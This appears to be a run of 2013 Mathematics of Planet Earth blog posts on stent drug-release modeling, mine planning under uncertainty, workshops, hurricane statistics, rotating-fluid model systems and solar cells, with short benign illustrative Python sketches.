“Historically, stent manufacturers have predominantly used empirical methods to design their drug-eluting stents. Those stents which show promising results in laboratory and clinical trials are retained and those that do not are discarded,” explains McGinty. “However, a natural question to ask is, what is the optimal design of a drug-eluting stent?”

The design of drug-eluting stents is severely limited by lack of understanding of the factors governing their drug release and distribution. “How much drug should be coated on the stent? What type of drug should be used?” McGinty questions. “All of these issues, of course, are inter-related. By developing models of drug release and the subsequent uptake into arterial tissue for current drug-eluting stents, and comparing the model solution with experimental results, we can begin to answer these questions.”

The model proposed by the authors considers a stent, embedded in the arterial wall, that is coated with a thin layer of drug-containing polymer, together with a porous region of smooth muscle cells embedded in an extracellular matrix.

When the polymer region and the tissue region are considered as a coupled system, it can be shown under certain conditions that the drug release concentration satisfies a special kind of integral equation, a Volterra integral equation, which can be solved numerically. The drug concentration in the system is determined from the solution of this integral equation. This gives the mass of drug within cells, which is of primary interest to clinicians.
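
For readers curious how such equations are handled numerically, here is a short, generic Python sketch (my own illustration, not the authors’ scheme) that solves a Volterra integral equation of the second kind with the trapezoidal rule and checks the result against a case whose exact solution is known.

```python
import numpy as np

def solve_volterra_2nd_kind(f, K, t):
    """Solve u(t) = f(t) + integral_0^t K(t, s) u(s) ds on the uniform grid t,
    using the composite trapezoidal rule (a standard textbook scheme, shown
    only for illustration; it is not necessarily the scheme used in the paper).
    """
    n = len(t)
    h = t[1] - t[0]
    u = np.empty(n)
    u[0] = f(t[0])
    for i in range(1, n):
        # Trapezoid weights: h/2 at both endpoints, h at interior nodes.
        acc = 0.5 * K(t[i], t[0]) * u[0]
        acc += sum(K(t[i], t[j]) * u[j] for j in range(1, i))
        # The unknown u[i] also enters with weight h/2; solve for it.
        u[i] = (f(t[i]) + h * acc) / (1.0 - 0.5 * h * K(t[i], t[i]))
    return u

# Check against a case with a known solution:
# u(t) = 1 + integral_0^t u(s) ds has the exact solution u(t) = exp(t).
t = np.linspace(0.0, 1.0, 101)
u = solve_volterra_2nd_kind(lambda x: 1.0, lambda x, s: 1.0, t)
print("max error vs exp(t):", np.abs(u - np.exp(t)).max())
```

In the paper, the forcing term and the kernel arise from the coupled polymer and tissue problem; the sketch above only illustrates the generic forward-in-time structure that such equations allow.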

The simple one-dimensional model proposed in the paper provides analytical solutions to this complex problem. “While the simplified one and two-dimensional models that our group and others have recently developed have provided qualitative results and useful insights into this problem, ultimately three-dimensional models which capture the full complex geometry of the stent and the arterial wall may be required,” McGinty says.

In a complex environment with pulsating blood flow, wound healing, cell proliferation and migration, and drug uptake and binding, the process of drug release from the stent may involve a multitude of factors, which could be best understood by three-dimensional models. “This is especially relevant when we want to consider the drug distribution in diseased arteries and when assessing the performance of the latest stents within complex geometries, where for instance, the diseased artery may bifurcate,” says McGinty. “We are therefore currently investigating the potential benefits of moving to three-dimensional models.”

Source article:
Sean McGinty, Sean McKee, Roger M. Wadsworth, and Christopher McCormick,
Modeling Arterial Wall Drug Concentrations Following the Insertion of a Drug-Eluting Stent,
SIAM Journal on Applied Mathematics, 73(6), 2004–2028. (Online publish date: November 12, 2013).
The source article is available for free access at the link above until March 9, 2014.

Posted in Biomedicine, Mathematics | Leave a comment

Workshop “Celestial, Molecular, and Atomic Dynamics” (CEMAD-2013)

A workshop on “Celestial, Molecular, and Atomic Dynamics” (CEMAD-2013) was held at the University of Victoria, Canada, 29 July-2 August, 2013. The workshop was sponsored by the Pacific Institute for the Mathematical Sciences (PIMS) and the University of Victoria, and organized by Florin Diacu (University of Victoria), Gregor Tanner (University of Nottingham, UK), and Andreas Buchleitner (University of Freiburg, Germany).

A continuation of the workshop “Few-Body Dynamics in Atoms, Molecules, and Planetary Systems,” held at the Max Planck Institute for the Physics of Complex Systems in Dresden, Germany, June 28-July 1, 2010, CEMAD-2013 aimed to bring together experts in celestial mechanics and semi-classical theory, as applied to the study of atoms and molecules, for the benefit of all those involved. The main emphasis was on the mathematical aspects of these research fields. The event was a satellite meeting of the Mathematical Congress of the Americas (MCA-2013) and part of Mathematics of the Planet Earth (MPE-2013).

One-hour invited lectures were given by (in alphabetical order):

  • Paula Balseiro, UFF – Rio de Janeiro, Brazil
  • Luis Benet, Mexico City, Mexico
  • Stefanella Boatto, UFRJ – Rio de Janeiro, Brazil
  • Alessandra Celletti, Rome, Italy
  • Nark Nyul Choi, Gumi, South Korea
  • Holger Dullin, Sydney, Australia
  • Andreas Knauf, Erlangen, Germany  
  • Jacques Laskar, Paris, France
  • Javier Madronero, Munich, Germany
  • Jesús Palacian, Pamplona, Spain
  • Thomas Pfeifer, Heidelberg, Germany
  • Gareth Roberts, Worcester, USA
  • Manuele Santoprete, Waterloo, Canada
  • Cristina Stoica, Waterloo, Canada
  • Susanna Terracini, Torino, Italy
  • Turgay Uzer, Atlanta, USA
  • Patricia Yanguas, Pamplona, Spain
  • Shiqing Zhang, Chengdu, China

Several contributed talks were given during the five days of the meeting. The pleasant atmosphere led to many interesting discussions. The most notable ones were about:

  • connecting the Wannier ridge, which is the single central configuration in helium, with the latest developments in the theory of central configurations;
  • finding the connection between atoms with more than three electrons and various central configurations that occur for the Coulomb potential;
  • generalizing the eZe configurations of the isosceles problem;
  • using recent achievements in KAM theory to bring to light new periodic orbits in atomic and molecular systems;
  • using the formalism of geometric mechanics to explore the symplectic structure of the equations that describe molecular dynamics;
  • exploring the use of symbolic dynamics, with the groups borrowing from each other’s experience for the benefit of all involved;
  • using new ways to apply McGehee coordinates in the study of motion near total collisions;
  • finding and investigating new symmetries, both in flat and curved space; and
  • exploring the latest quantum experiments from various mathematical points of view.

The participants deemed the meeting a great success and many of them reinforced the idea that workshops on this topic should continue in the future.

Florin Diacu, University of Victoria

Posted in Workshop Report | Leave a comment

Sustainable Development and Utilization of Mineral Resources

A Stochastic Mine Planning and Production Scheduling Optimization Framework with Uncertain Metal Supply and Market Demand

The sustainable development and utilization of mineral resources and reserves is an area of critical importance to society, given the fast growth of, and demand from, new emerging economies as well as environmental and social concerns. Sustainable mineral resource development is, however, affected by uncertainty in several forms: the ability of ore bodies to supply raw materials, operational mining conditions, fluctuating market demand for raw materials and metals, commodity prices, and exchange rates.

Throughout the last decade, new technological advances in stochastic modelling, optimization and forecasting of mine planning and production performance have been shown to simultaneously enhance production and return on investment. These advances shifted the paradigm in the field, produced initially counterintuitive outcomes that are now well understood, and outlined new areas of research needs. The old paradigm, in which mineral reserves are estimated, mine planning is optimized, and production is forecast deterministically, results in single, often biased and flawed forecasts. These flaws are largely due to the nonlinear propagation of errors associated with ore bodies throughout the chain of mining.

The new stochastic paradigm addresses these limits: application of the stochastic framework increases the net present value (NPV) of mine production schedules by 20-30%. It also allows stochastically optimal pit limits to be about 15% larger in total tonnage than conventionally optimal pit limits, adding roughly another 10% to the NPV. Related technical developments also impact: (i) sustainable utilization of mineral resources; (ii) uncertainty quantification and risk management; (iii) social responsibility through improved financial performance; (iv) enhancement of production and product supply; (v) contribution to the management of mine remediation; and (vi) objective, technically defendable decision-making.
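
None of the numbers or models below come from the McGill framework; the snippet is only a toy illustration, with invented figures, of one idea behind the paradigm shift: a fixed production schedule evaluated over many equally probable simulated orebody scenarios yields an expected NPV (and a risk profile) that can differ markedly from the single forecast obtained from an averaged, "estimated" orebody.

    import numpy as np

    rng = np.random.default_rng(0)

    # Hypothetical setup: one fixed 10-year schedule evaluated over 50 equally
    # probable simulated orebody scenarios (all figures are illustrative only).
    years, scenarios = 10, 50
    metal = rng.lognormal(mean=0.0, sigma=0.3, size=(scenarios, years))  # kt/yr
    cap = 1.1                 # processing capacity, kt/yr (assumed)
    price, cost = 8.0, 5.0    # M$ per kt of recovered metal; fixed M$/yr cost
    discount = 0.10

    def npv(cashflows, r):
        return sum(cf / (1 + r) ** (k + 1) for k, cf in enumerate(cashflows))

    cash = price * np.minimum(metal, cap) - cost      # M$/yr, capped by the mill
    npvs = np.array([npv(row, discount) for row in cash])

    # Single "average orebody" forecast versus the expectation over scenarios
    single = npv(price * np.minimum(metal.mean(axis=0), cap) - cost, discount)
    print(f"single-estimate NPV: {single:6.1f} M$")
    print(f"expected NPV       : {npvs.mean():6.1f} M$ "
          f"(P10 {np.percentile(npvs, 10):.1f}, P90 {np.percentile(npvs, 90):.1f})")

Because the annual cash flow in this toy is capped by processing capacity (a nonlinearity), the single-estimate forecast overstates the value, which illustrates in miniature why deterministic forecasts can be biased.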

Ongoing research efforts focus in particular on two interrelated topics, amongst others:

  • Quantification of geological uncertainty / uncertainty in metal supply, including a new high-order modeling framework for spatial data, defined in terms of measures of high-order complexity in spatial architectures termed spatial cumulants. Cumulants are combinations of moments of statistical parameters that characterize non-Gaussian random fields. To date, research provides definitions, geological interpretations and implementations of high-order spatial cumulants that are used in the high-dimensional space of Legendre polynomials to stochastically simulate complex, non-Gaussian, nonlinear spatial phenomena. Advantages include (a) the absence of distributional assumptions and pre-/postprocessing steps, e.g., data normalization or training image (TI) filtering; (b) the use of high-order relations in the data in the simulation process (data-driven, not TI-driven); and (c) the generation of complex spatial patterns reproducing any data distribution, variograms, and high-order spatial cumulants. The approach is an alternative to the multiple-point methods applied by our Stanford University colleagues, with additional advantages (it is data-driven and consistently reconstructs the lower-order spatial complexity in the data, in addition to the high-order complexity). Research directions include the search for new methods for high-order simulation of categorical data (e.g., geology of mineral or petroleum deposits, ground water aquifers, sites for CO2 sequestration), as well as high-order simulations for spatially correlated attributes and principal cumulant decomposition methods.

    All of these developments are critical in modeling the uncertainty in the material types and metal content extracted from the ground, with particular emphasis on the spatial high-order connectivity of extreme values (high metal content). These models have significant impacts on mine production planning, scheduling and forecasting, from single mines to mineral supply chains.

  • The development of global stochastic optimization techniques for mining complexes / mineral supply chains. These optimization techniques are a core aspect of mine design and production scheduling because they maximize the economic value generated by the production of ore and define a technical plan to be followed from the development of the mine to its closure. This planning optimization is a complex problem to address due to its large scale, the uncertainty in the key parameters involved (geological, mining, financial), and the absence of a method for the global or simultaneous optimization of the individual elements of a mining complex or mineral supply chain. In the past years, our research on the global optimization of mining complexes has proceeded through the development of a new stochastic optimization framework that integrates multiple mines; multiple processing streams, including blending stockpiles and waste dumps designed to meet quality specifications, minimize environmental impact and integrate waste management issues; and transportation methods. The ability to manage and simultaneously optimize all aspects of a mining complex leads to mine plans that not only minimize risk related to environmental impact and rehabilitation, but have also been shown to increase the economic value, reserves and life-of-mine forecasts, thus contributing to the sustainable development of the non-renewable resource.

    Stochastic integer programming has been a core framework in our stochastic optimization efforts. However, the scale of the scheduling and material-flow problem through a mineral supply chain, from mines to products, is very large and requires the development of efficient solution strategies for the proposed formulations, which are sought through metaheuristics. For example, a hybrid approach integrating metaheuristics and linear programming makes it possible to link the long-term production schedule with the short-term schedule, whereby the information gleaned from the solution of one can be used to improve the other, leading to globally optimal and practical mine plans. Extensive testing, applications and benchmarking of the methods being developed are underway, and the more promising approaches are being field tested at mine sites with collaborating companies from North to South America, and Africa to Australia.

For more information, see the related webinar available at the McGill web site.

For a short video with simple explanations, see the NSERC website.

Roussos Dimitrakopoulos
roussos.dimitrakopoulos@mcgill.ca

Posted in Optimization, Resource Management | Leave a comment

Article on “Mathematics for Planet Earth, Science for Human Well-being”

This month’s issue of La Gaceta de la RSME—the members’ journal of the Royal Spanish Mathematical Society—features an article by Miguel Ángel Herrero (Universidad Complutense de Madrid) under the title “Matemáticas para el planeta Tierra, ciencia para el bienestar humano” (“Mathematics for Planet Earth, Science for Human Well-being”). The article can be downloaded free of charge by clicking here.

The article and the cover images of the four issues of volume 16 of La Gaceta, with short explanations, are a contribution of the Real Sociedad Matemática Española to MPE2013. They can be found on the journal’s web page.

Posted in General | Leave a comment

Kickoff of Mathematics of Planet Earth 2013-Plus (MPE 2013+)


MPE 2013+, which extends MPE2013 into the future, is kicking off in January with a workshop, Mathematics of Planet Earth: Challenges and Opportunities – Introducing Participants to MPE 2013+ Topics, which will be held at Arizona State University January 7-10, 2014. The workshop aims to expose students and junior researchers to the challenges facing our planet, the role of the mathematical sciences in addressing those challenges, and the opportunities to get involved in the effort. Financial support is available for participants to attend this workshop and to take part in follow-up activities. Some spots are still available. More information on the workshop and financial support is available here.

This workshop feeds into workshops reflecting six themes. In each case, there will be a workshop followed by other activities such as small group meetings, collaborations, miniworkshops, etc. While these activities are planned to initiate in the U.S., we look forward to involving partners all over the world. The initial workshops that reflect these themes are:

  • Workshop on Sustainable Human Environments
    Rapidly growing urban environments present new and evolving challenges. With recent advances in technology, we can infuse our existing infrastructures with new intelligence to sense, analyze, and integrate data, and respond intelligently to the needs of cities’ jurisdictions. This workshop explores the role of data in “smart cities,” anthropogenic biomes, and security.
    Location: DIMACS-Rutgers University, April 23-25, 2014

  • Workshop on Natural Disasters
    No part of the world is impervious to natural disaster. Epidemics, earthquakes, floods, hurricanes, drought, tornadoes, wildfires, tsunamis, and extreme temperatures routinely take their toll. This workshop looks at how computational sciences can help in predicting, monitoring, and responding to such events, and mitigating their effects.
    Location: Georgia Tech, May 13-15, 2015

  • Workshop on Global Change
    The planet is constantly changing, but the pace of change has accelerated as a result of human activity. We need to monitor global change to understand the processes leading to change, learn how to mitigate and adapt to its effects, determine whether we are meeting goals for our planet, and get early warning of dangerous trends. This workshop explores the observations and metrics used to measure the effects of global change.
    Location: University of California-Berkeley, May 19-21, 2014

  • Workshop on Management of Natural Resources
    To maintain the long-term well-being of the global population, management of the world’s natural resources must emphasize conservation and renewal over depletion and spending. This workshop will investigate challenges for the computational sciences including models and algorithms that describe processes affecting water, forests, and food supplies. They involve complex adaptive systems that interconnect natural systems with human ones, thus calling for understanding of both types of systems.
    Location: Howard University, June 4-6, 2015

  • Workshop on Data-aware Energy Use
    We need to make good choices about today’s energy investments, because they will be with us for a long time. Data can help us make better choices if we can surmount concomitant challenges. This workshop will explore harnessing data to address problems in energy, emphasizing four main areas: energy investment portfolios; smart grid; smart buildings; and electric vehicles.
    Location: UC-San Diego, September 2014

  • Workshop on Education for the Planet Earth of Tomorrow
    The issues facing the planet call for a new type of workforce, trained in multidisciplinary and multinational communication and collaboration. To function in this rapidly changing world, students will need to appreciate the most important concepts at the interface between their discipline and others. There has never been a more crucial time to ensure that we train the next generation of scientists, engineers, and decision makers to be able to think broadly across disciplines. This workshop will bring together the educational findings of the previous five workshops with discussions focusing on workforce development and the MPE education plan.
    Location: NIMBioS University of Tennessee, Fall, 2015

For more information on the MPE 2013+ Program, please click here or contact Eugene Fiorini at mpe2013p@dimacs.rutgers.edu.

Posted in Workshop Announcement | Leave a comment

SIAM Conference — Analysis of Partial Differential Equations

SIAM’s final conference in the year of “Mathematics of Planet Earth” covers the analysis of partial differential equations. This topic concerns the development of methods to analyze the equations that result, in many cases, from modeling physical or biological phenomena. While the focus is on the mathematical analysis rather than the physical models, one can nevertheless readily see the connections to the mathematics of Planet Earth and the power of mathematics to understand the world around us.

To cite one example, the conference offers an invited presentation by Philip Maini on “Modelling Collective Cell Motion in Biology.” The talk will consider three different examples of collective cell movement, each of which requires a different modeling approach. One involves the movement of cells in epithelial sheets. Another is cranial neural crest cell migration, which requires a different kind of model. The third is acid-mediated cancer cell invasion, modeled via a coupled system of nonlinear partial differential equations. These can all be expressed in a common framework (nonlinear diffusion equations), which can then be used to understand a range of biological phenomena.
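
The models Maini will discuss are considerably richer; the following is only a minimal sketch, with assumed parameters, of the simplest member of the common framework mentioned above: the Fisher-KPP nonlinear reaction-diffusion equation $u_t = D u_{xx} + r u(1-u)$ for an invading cell population, integrated with an explicit finite-difference scheme.

    import numpy as np

    # Fisher-KPP equation u_t = D u_xx + r u (1 - u): the simplest nonlinear
    # diffusion model for an invading cell population (parameters assumed).
    D, r = 1.0, 1.0
    L, nx = 100.0, 401
    dx = L / (nx - 1)
    dt = 0.4 * dx**2 / D                    # explicit stability restriction
    x = np.linspace(0.0, L, nx)
    u = np.where(x < 10.0, 1.0, 0.0)        # cells initially occupy the left edge

    for _ in range(int(30.0 / dt)):         # integrate to t = 30
        lap = np.zeros_like(u)
        lap[1:-1] = (u[2:] - 2 * u[1:-1] + u[:-2]) / dx**2
        lap[0] = 2 * (u[1] - u[0]) / dx**2        # no-flux boundaries
        lap[-1] = 2 * (u[-2] - u[-1]) / dx**2
        u = u + dt * (D * lap + r * u * (1 - u))

    front = x[np.argmax(u < 0.5)]
    print(f"front has reached x ~ {front:.1f} (asymptotic speed 2*sqrt(D*r) = 2)")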

Such is the power of mathematics to develop tools which apply across a wide range of phenomena.

Posted in Conference Announcement, Mathematics | Leave a comment

Wimpy Hurricane Season a Surprise — And a Puzzle for Statisticians

Following are excerpts of an article in the Environment section of today’s Washington Post, written by Brian McNoldy.

“It was a hurricane season almost without hurricanes. There were just two, Humberto and Ingrid, and both were relatively wimpy, Category 1 storms. That made the 2013 Atlantic hurricane season, which ended Saturday, the least active in more than 30 years — for reasons that remain puzzling.

The season, from June through November, has an average of 12 tropical storms, of which six to seven grow to hurricane strength with sustained winds of 74 mph or greater. Typically, two storms become “major” hurricanes, Category 3 or stronger, with sustained winds of at least 111 mph.

In 2013, there were 13 tropical storms, a typical number, but for the first time since 1994 there were no major tempests in the Atlantic. The last time there were only two hurricanes was 1982.

The quiet year is an outlier, however, in the recent history of Atlantic cyclones. The National Oceanic and Atmospheric Administration notes that 2013 was only the third calmer-than-average year since 1995.

The most intense storms this year had maximum sustained winds of only about 86 mph [$\ldots$], the weakest maximum intensity for a hurricane during a season since 1968. The first hurricane, Humberto, was just hours from matching the record for the latest first hurricane, Sept. 11.

In terms of accumulated cyclone energy (ACE), the seasonal total stands at 31.1, the lowest since 1983 and just 30 percent of average. (ACE is the sum of the squares of all of the storms’ peak wind speeds at six-hour intervals, and is a good measure of a storm season’s overall power.) Looking back to 1950, only four other years had lower ACE totals: 1972, 1977, 1982 and 1983.

[$\ldots$]

Why was this season so inactive? What did the forecasts miss? Although there are some hypotheses, it is not entirely clear. We may have to wait another couple of months, but in the meantime, there are some potential explanations.

Major signals such as the El Niño Southern Oscillation (ENSO), surface pressure and sea-surface temperature all pointed to an average to above-average season. But there were some possible suppressing factors.

Dry air

Even over the long three-month window of August to October, the vast majority of the tropical Atlantic was dominated by drier-than-normal air, especially in the deep tropics off the coast of Africa. Dry air can quickly weaken or dissipate a tropical cyclone, or inhibit its formation.

Stable air

The average temperature profile in the region was less conducive to thunderstorm growth and development during the core months, which means that the amount of rising air in the region may have been reduced as well.

Weak African Jet Stream

Tropical waves, the embryos of many tropical cyclones, have their origins over continental Africa. A persistent feature called the African easterly jet stream—a fast-moving river of air in the low and middle levels of the atmosphere—extends from Ethiopia westward into the tropical Atlantic Ocean. It breaks down into discrete waves, and every few days another wave leaves the coast. Some are barely noticeable, while others become tropical storms.

During the height of the hurricane season, most tropical cyclones form from disturbances off the coast of Africa. Winds in the jet normally cruise along at 20 to 25 mph at an altitude of 10,000 feet from August to October, but this year they were about 12 to 17 mph weaker. One would expect that to have a big impact on the amplitude of easterly waves and the hurricane season.

Links to Global Warming?

One question that inevitably is asked is how the season’s inactivity relates to climate change. It’s not accurate to associate any particular season (and definitely not a specific storm) with climate change. One season’s activity does not allow any conclusions about the role of climate change. The reason is that intra- and inter-seasonal variability is so large that any subtle signals of influence from climate change are overwhelmed.”

Brian McNoldy is a tropical weather researcher at the University of Miami’s Rosenstiel School of Marine and Atmospheric Science and a contributor to the Capital Weather Gang blog on washingtonpost.com.
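
As a side note on the ACE metric quoted above: in the standard convention the six-hourly maximum sustained winds are taken in knots, only records at or above tropical-storm strength (35 kt) are counted, and the sum of squares is divided by $10^4$. The wind values below are invented purely to illustrate the arithmetic; real seasonal totals come from the best-track data.

    # Accumulated cyclone energy from 6-hourly maximum sustained winds in knots,
    # counting only records at tropical-storm strength or above (>= 35 kt).
    # The wind values are invented; real totals come from the best-track data.
    def ace(winds_kt):
        return sum(v ** 2 for v in winds_kt if v >= 35) / 1e4

    humberto = [35, 40, 50, 65, 70, 75, 70, 60, 50, 40]   # hypothetical records
    ingrid   = [35, 45, 55, 65, 75, 65, 55, 45]           # hypothetical records
    print(f"toy two-storm season: ACE = {ace(humberto) + ace(ingrid):.1f}")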

Posted in Atmosphere, Extreme Events, Meteorology, Statistics | Leave a comment

Atmosphere and Ocean Dynamics through the Lens of Model Systems

The atmosphere and ocean are central components of the climate system, where each of these components is affected by numerous significant factors through highly nonlinear relationships. It would be impossible to combine all of the important interactions into a single model. Therefore, determining the contribution of each factor, in both a quantitative and qualitative sense, is necessary for the development of a predictive model, not to mention a better understanding, of the climate system.

An approach that is appealing to mathematicians is to construct a hierarchy of models, starting from the simplest, designed to provide a “proof of concept,” and then progressively adding detail and complexity as an understanding of the factors involved in the simpler model is gained and as the necessary analysis tools are developed and refined. The question arises as to how to progress from the simple to the complex, and the challenge is to justify the choice.

One possibility is to study quantitatively accurate mathematical models of what I will call model systems, i.e., the simplification does not come through the mathematical modeling but simply from considering a simpler system. For example, the mathematical models of these systems do not require parameterizations of sub-grid-scale processes. In other words, these systems resemble laboratory experiments that could be, or have been, conducted.

An example of a model system is the differentially heated rotating annulus, which consists of a fluid contained in a rotating cylindrical annulus while the rotation rate and the temperature difference between the inner and outer walls of the annulus are varied (see figure). Systems of this type produce an intriguing variety of flow patterns that resemble those observed in actual geophysical flows [5]. Thus, a careful study of this system is not only inherently interesting from a nonlinear dynamics/pattern formation perspective, but can also provide insight into the dynamical properties of large-scale geophysical fluids.



Figure 1: The differentially heated rotating annulus (left) and an example of a rotating wave (right), which is represented by a snapshot of a horizontal cross-section. The rotating wave rotates at constant phase speed, where the colours represent the fluid temperature (blue is cold, red is hot), and the arrows represent the fluid velocity.

The study of model systems is appealing for a number of reasons. First, although still very challenging, an analysis of mathematical models of these systems may be feasible if appropriate numerical methods are considered. For example, numerical bifurcation techniques for large-scale dynamical systems as discussed in [1] can be useful in the analysis of these systems. See, e.g. [4], in which bifurcation methods are applied to the differentially heated rotating annulus. Also, unlike realistic large-scale models, the results of the analysis may be quantitatively verified by comparison with observations from laboratory experiments, providing a very stringent test on the validity of any new numerical method or analysis technique that you may use.
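
The computations in [1] and [4] apply such techniques to large discretizations of the governing fluid equations; the toy sketch below only illustrates the core idea of one workhorse method, pseudo-arclength continuation, on a scalar problem $f(u,\lambda) = \lambda - u^2 = 0$, whose solution branch folds back at $\lambda = 0$ (where continuation in $\lambda$ alone would fail).

    import numpy as np

    # Pseudo-arclength continuation of solutions of f(u, lam) = 0 around a fold.
    # Toy problem: f(u, lam) = lam - u**2, with a fold (turning point) at (0, 0).
    def f(u, lam):    return lam - u**2
    def fu(u, lam):   return -2.0 * u
    def flam(u, lam): return 1.0

    def continue_branch(u, lam, du, dlam, ds=0.05, steps=80):
        branch = [(u, lam)]
        for _ in range(steps):
            u0, lam0 = u, lam
            u, lam = u0 + ds * du, lam0 + ds * dlam          # tangent predictor
            for _ in range(20):                               # Newton corrector
                F = np.array([f(u, lam),
                              du * (u - u0) + dlam * (lam - lam0) - ds])
                if np.linalg.norm(F) < 1e-12:
                    break
                J = np.array([[fu(u, lam), flam(u, lam)],
                              [du, dlam]])
                delta = np.linalg.solve(J, -F)
                u, lam = u + delta[0], lam + delta[1]
            # new unit tangent, oriented consistently with the previous one
            tvec = np.linalg.solve(np.array([[fu(u, lam), flam(u, lam)],
                                             [du, dlam]]),
                                   np.array([0.0, 1.0]))
            du, dlam = tvec / np.linalg.norm(tvec)
            branch.append((u, lam))
        return np.array(branch)

    # start on the branch u = sqrt(lam), heading toward the fold
    branch = continue_branch(u=1.0, lam=1.0,
                             du=-1.0 / np.sqrt(5.0), dlam=-2.0 / np.sqrt(5.0))
    print("smallest lambda reached:", branch[:, 1].min())     # ~0: the fold

The same predictor-corrector structure, with the scalar unknown replaced by a discretized flow field and the linear solves done iteratively, is essentially what large-scale implementations such as those surveyed in [1] build on.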

I have emphasized the mathematical perspective, but, of course, the experiments themselves are invaluable in developing an understanding of physical phenomena of interest.

Such an approach can also be applied even when the corresponding model system cannot be replicated in the laboratory. For example, in [2] and [3], we study a model of a fluid contained in a rotating spherical shell that is subjected to radial gravity and an equator-to-pole differential heating. The results show that as the differential heating is increased, a transition from a one-cell pattern to a two- or three-cell pattern is observed, and we show that this transition is associated with a cusp bifurcation. It is also argued that this transition may be related to the expansion of the Hadley cell that has been observed in Earth’s atmosphere.

Although this approach is “standard” and has fruitfully been used for many years [5], I don’t believe that it has been fully exploited in the context of atmospheric and ocean dynamics. However, it seems that recently it has received increased interest. This is evidenced by a forthcoming book entitled Modelling Atmospheric and Oceanic Flows: Insights from laboratory experiments and numerical simulations [6], and a EUROMECH workshop of the same name that took place at the Freie Universität Berlin in September 2013 (see the workshop‘s webpage: http://euromech552.mi.fu-berlin.de/ for details). In other words, the book and workshop are focused on model systems that are studied using laboratory experiments and numerical methods with the goal of developing an understanding of atmospheric and oceanic fluid flow. The workshop was an excellent example of how bringing together open-minded people from a variety of backgrounds can lead to insight into particular issues and potentially fruitful collaborations. In particular, at the workshop, there was a very interesting mix of meteorologists, oceanographers, physicists and mathematicians. To give an idea of the variety of interesting topics that were covered, I will simply list the five plenary talks:

  • Jan-Bert Flor, from CNRS and Université de Grenoble, spoke about studying small and large scale frontal instabilities using a two-layer fluid contained in a cylindrical annulus and forced by a rotating disk at the surface;
  • Laurette Tuckerman, from the École Supérieure de Physique et de Chimie Industrielles de la Ville de Paris (ESPCI), spoke about numerical bifurcation methods for fluid dynamics problems;
  • Leo Maas, from the Royal Netherlands Institute for Sea Research (NIOZ) and the Institute for Meteorology and Oceanography Utrecht (IMAU), spoke about using both theory and experiment to study inertial waves, and their possible relationship to wave-driven flows;
  • Uwe Harlander, from Brandenburg University of Technology, spoke about using orthogonal decomposition methods to better understand the flow in the differentially heated rotating annulus; and
  • Peter Read, from the University of Oxford, spoke about using experiments to study various flow features such as heat and tracer transport, and discussed how the model systems relate to their geophysical counterparts.

For more information, I suggest the interested reader keep an eye out for the forthcoming book [6]. Many of the workshop attendees have contributed to the book, and it will certainly contain much more information about the variety of atmospheric and oceanic phenomena that are being studied using model systems.

References:
[1] H.A. Dijkstra and others. Numerical bifurcation methods and their application to fluid dynamics. Commun. Comput. Phys., 15(1):1-45, 2014.
[2] W.F. Langford and G.M. Lewis. Poleward expansion of Hadley cells. Can. Appl. Math. Quart., 17(1):105–119, 2009.
[3] G.M. Lewis and W.F. Langford. Hysteresis in a rotating differentially heated spherical shell of Boussinesq fluid. SIAM J. Appl. Dyn. Syst., 7(4):1421–1444, 2008.
[4] G.M. Lewis, N. Périnet, and L. van Veen. The primary flow transition in the baroclinic annulus: Prandtl number effects. In T. von Larcher and P.D. Williams, editors, Modelling Atmospheric and Oceanic Flows, Geophysical Monograph Series. Geopress, Amsterdam, 2014.
[5] P.L. Read. Dynamics and circulation regimes of terrestrial planets. Planet. Space Sci., 59:900–914, 2011.
[6] T. von Larcher and P.D. Williams, editors. Modelling Atmospheric and Oceanic Flows. Insights from laboratory experiments and numerical simulations. Geophysical Monograph Series. Geopress, Amsterdam, 2014.

Greg Lewis
Faculty of Science, UOIT
2000 Simcoe St. North
Oshawa, ON, Canada L1H 7K4
Greg.Lewis@uoit.ca

Posted in Atmosphere, Climate Modeling, Ocean | Leave a comment

Kofi Annan on Climate Politics

For the blog today we recommend reading what Kofi Annan wrote for the New York Times this week.

There’s no mathematics in it, but it’s important. Annan writes, “If governments are unwilling to lead when leadership is required, people must. We need a global grass-roots movement that tackles climate change and its fallout.”

The MPE2013 initiative is itself something of a grass-roots movement, concerned with many issues big and small, including climate change. The mathematical sciences community has focused on these issues perhaps more this year than in other years. We need to continue.

Happy Thanksgiving from everyone at AIM!

Brian Conrey
American Institute of Mathematics

Posted in Climate Change, Political Systems | Leave a comment

Life on the Edge – Mathematical Insights Yield Better Solar Cells

Last Tuesday I had the pleasure of attending the Third Annual Mitacs Awards ceremony in Ottawa. These awards recognize the outstanding R&D innovation achievements of the interns supported by the various Mitacs programs—Accelerate, Elevate and Globalink. This year, I was particularly inspired by the story of the winner of the undergraduate award category, a Globalink intern from Nanjing University in China named Liang Feng. The Globalink program invites top-ranked undergraduate students from around the world to engage in four-month research internships at universities across Canada. Liang Feng spent this summer in the lab of Professor Jacob Krich of the University of Ottawa Physics Department studying Intermediate Band (IB) photovoltaics, a technology that is being used to design the next generation of solar cells.

Modern solar cells are based on silicon and other semiconductor materials and have been around for nearly 60 years. The first practical device, the “solar battery,” was invented at Bell Labs in 1954 and achieved 6% efficiency in converting incident sunlight into electricity. By 1961, it was determined that the “theoretical limit” for the efficiency of a solar cell based on a single p-n junction is 33.7%. As with many theoretical limits, creative scientists have found ways to break the rules, and the best solar cells today use multilayer structures and exotic materials to achieve more than 44% efficiency in converting sunlight into electricity.

Photovoltaic band gap diagram courtesy Jacob Krich, University of Ottawa

In IB solar cells, additional semiconducting materials such as quantum dots are added to make it easier for electrons to be liberated by sunlight. Instead of requiring a single higher-energy photon to knock an electron from the Valence Band (VB) to the Conduction Band (CB), the job can now be done by two or more low-energy photons. Thus more of the sunlight’s spectrum is harnessed by the cell, by providing electrons with several possible steps on their staircase to freedom.
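
To make the “staircase” idea concrete, photon energy and wavelength are related by $E \approx 1239.84/\lambda$ with $E$ in eV and $\lambda$ in nm; the band-gap values below are purely illustrative, not those of any particular IB material.

    # Photon energy E (eV) and wavelength lambda (nm): E ~ 1239.84 / lambda.
    # The band-gap energies below are illustrative, not those of a real material.
    def max_wavelength_nm(energy_ev):
        return 1239.84 / energy_ev

    full_gap = 1.9            # hypothetical VB -> CB gap (eV)
    ib_steps = (1.2, 0.7)     # hypothetical VB -> IB and IB -> CB steps (eV)

    print(f"single photon VB->CB: needs lambda <= {max_wavelength_nm(full_gap):.0f} nm")
    for e in ib_steps:
        print(f"sub-gap step of {e} eV: photons out to {max_wavelength_nm(e):.0f} nm contribute")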

